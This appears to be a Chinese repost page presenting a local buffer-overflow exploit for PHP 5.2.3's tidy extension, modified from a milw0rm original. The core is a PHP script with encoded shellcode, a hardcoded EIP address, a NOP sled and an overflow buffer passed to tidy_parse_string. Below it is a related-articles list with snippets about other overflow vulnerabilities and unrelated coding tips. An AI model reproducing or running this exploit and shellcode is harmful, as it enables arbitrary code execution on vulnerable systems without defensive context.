PHP 5.2.3 tidy扩展本地溢出漏洞利用代码

代码如下:

<?php

if (!extension_loaded("tidy")){die("you need Tidy extension loaded!");}

$scode = 
"\xfc\xbb\xc7\xc4\x05\xc9\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85". 
"\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x3b\x2c\x41\xc9\xc3\xad\xc1". 
"\x8c\xff\x26\xa9\x0b\x87\x39\xbd\x9f\x38\x22\xca\xff\xe6\x53\x27". 
"\xb6\x6d\x67\x3c\x48\x9f\xb9\x82\xd2\xf3\x3e\xc2\x91\x0c\xfe\x09". 
"\x54\x13\xc2\x65\x93\x28\x96\x5d\x58\x3b\xf3\x15\x3f\xe7\xfa\xc2". 
"\xa6\x6c\xf0\x5f\xac\x2d\x15\x61\x59\x5a\x39\xea\x9c\xb7\xcb\xb0". 
"\xba\x43\x0f\x79\x03\x2f\x04\x3a\xb3\x2a\xda\xc3\xbf\xbf\x9b\x3f". 
"\x4b\xcf\x07\xed\xc0\x47\x30\x06\xdf\x1c\xc0\x68\xe0\x22\xc1\x03". 
"\x89\x1e\x9e\x22\xbc\x3e\x76\xcc\xb8\x3d\xb6\xb5\x68\x29\xc7\xc0". 
"\x8d\xf6\x4f\x4d\x73\x82\x9e\x3a\x73\x75\xfd\xa9\xef\x57\x67\x4a". 
"\x95\x87\x48\xc9\x75\xa9\xf3\x79\x56\x40\x8f\xe4\xe4\x8a\x1d\x86". 
"\x71\xa2\xd5\x2b\xa2\x40\x77\xd5\xca\x90\x14\x05\x24\x99\x9e\x01". 
"\x1a\x3f\x39\xaa\x34\x5a\x31\x8a\xa4\xcb\xda\xab\x58\x74\x6f\x43". 
"\xd4\x0a\xaf\xda\x72\x87\xc6\xb2\x13\x24\x6d\x39\x85\xbe\xe2\xcf". 
"\x36\x1e\x8f\x4e\xc0\x36\x5b\xf2\x12\xe9\xe2\xb0\x16\xf5\xe4\x38". 
"\x97\xf5\xe4\x38\x97";

$EIP="\xD8\x69\x83\x7C";  
$NOP=str_repeat("\x90",12); 
$____buff=str_repeat("a",2036).$EIP.$NOP.$scode; 
tidy_parse_string(1,$____buff,1); 
?>

看了MILW0RM上的EXP稍微改了下,中

(0)

相关推荐

  • PHP 5.2.3 tidy扩展本地溢出漏洞利用代码

    复制代码 代码如下: <?php if (!extension_loaded("tidy")){die("you need Tidy extension loaded!");} $scode =  "\xfc\xbb\xc7\xc4\x05\xc9\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85".  "\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x3b\x2c\x41

  • 诱人视频请君入瓮 解析RealPlayer溢出漏洞

    有这样一种视频,它极其诱人,你无法抗拒它的诱惑,点击.在一阵等待之后,你会觉察到刚才看到的只是"海市蜃楼",此时,你已身处深不见底的"瓮"中. RealPlayer是大家常用的媒体播放器,用户非常多,因此它一旦出现漏洞,必定会有很多人遭到攻击.以前RealPlayer Server就曾爆出过一个远程溢出漏洞,使得许多影视网站遭到攻击.如今,当大家已淡忘上次的漏洞灾害所带来的痛苦时,新版RealPlayer中又出现了溢出漏洞. 现在,众多"黑客"已

  • PHP5.0 TIDY_PARSE_FILE缓冲区溢出漏洞的解决方案

    漏洞说明 不得不再次吐槽一下exploit-db对exp审核的质量,这个exp仍然不能触发漏洞,修改第一个参数则可以触发,我给出的poc是一个可以触发php漏洞的,问题出现在php_tidy.dll扩展中,对tidy_parse_file的第二个参数,也就是文件绝对路径没有进行长度控制和内容校验,导致在fopen失败后进入失败处理逻辑引发缓冲区溢出,下面对此漏洞进行详细分析. 软件下载: https://www.exploit-db.com/apps/f8fb5676b6a32f7be1c8d8

  • PHP5.2下chunk_split()函数整数溢出漏洞 分析

    受影响系统:PHP PHP < 5.2.3不受影响系统:PHP PHP 5.2.3描述:--------------------------------------------------------------------------------BUGTRAQ ID: 24261CVE(CAN) ID: CVE-2007-2872 PHP是一种流行的WEB服务器端编程语言. PHP中的chunk_split函数在处理畸形参数时存在整数溢出漏洞,本地攻击者可能利用此漏洞提升自己的权限. PHP中

  • Java编程常见内存溢出异常与代码示例

    Java 堆是用来存储对象实例的, 因此如果我们不断地创建对象, 并且保证 GC Root 和创建的对象之间有可达路径以免对象被垃圾回收, 那么当创建的对象过多时, 会导致 heap 内存不足, 进而引发 OutOfMemoryError 异常. /** * @author xiongyongshun * VM Args: java -Xms10m -Xmx10m -XX:+HeapDumpOnOutOfMemoryError */ public class OutOfMemoryErrorTe

  • Yii安装EClientScript插件扩展实现css,js文件代码压缩合并加载功能

    本文实例讲述了Yii安装EClientScript插件扩展实现css,js文件代码压缩合并加载功能.分享给大家供大家参考,具体如下: 扩展插件下载地址,解压后复制到/protected/vendor/ https://github.com/muayyad-alsadi/yii-EClientScript main配置文件配置插件,components里面增加 //js,css代码压缩,合并 'clientScript' => array( 'class' => 'application.ven

  • 我是如何发现CCProxy远程溢出漏洞的

    CCProxy是一个国产的支持HTTP.FTP.Gopher.SOCKS4/5.Telnet.Secure(HTTPS).News(NNTP). RTSP.MMS等代理协议的代理服务器软件.因为其简单易用.界面友好,非常适合在对流量要求不高的网络环境中使用,所以在国内有很多初级的网管喜欢用这个软件,有时候我在公司上网也要用它做代理.前些日子我测试发现CCProxy 6.0版本存在多处缓冲区溢出漏洞,可以导致攻击者远程执行任意代码. TIPS:什么是Gopher.RTSP.MMS? Gopher是

  • iOS 本地存储NSUserDefaults封装代码

    直接上代码 #import <Foundation/Foundation.h> @interface NSUserDefaultUtil : NSObject +(void)PutDefaults:(NSString *)key Value:(id)value; +(id)GetDefaults:(NSString *)key; @end #import "NSUserDefaultUtil.h" @implementation NSUserDefaultUtil +(vo

  • 易语言调用dll实现条形码本地离线识别的代码

    DLL命令表 需要提前下载用到命令对应的库 .版本 2 .DLL命令 OCR, 文本型, "AspriseVB.dll", "OCR" .参数 file, 文本型 .参数 imageType, 整数型 .DLL命令 OCRBarCodes, 文本型, "VBWrapper.dll", "OCRBarCodes" .参数 file, 文本型 .参数 imageType, 整数型 .DLL命令 OCRpart, 文本型, &quo

  • js中位数不足自动补位扩展padLeft、padRight实现代码

    方法一.自定义函数实现,不方便自定义调用 function FillZero(p) { return new Array(3 - (p + '').length + 1).join('0') + p; } FillZero(6); //输出006 方法二.String方法一扩展(C#中PadLeft.PadRight) String.prototype.PadLeft = function (len, charStr) { var s = this + ''; return new Array(

随机推荐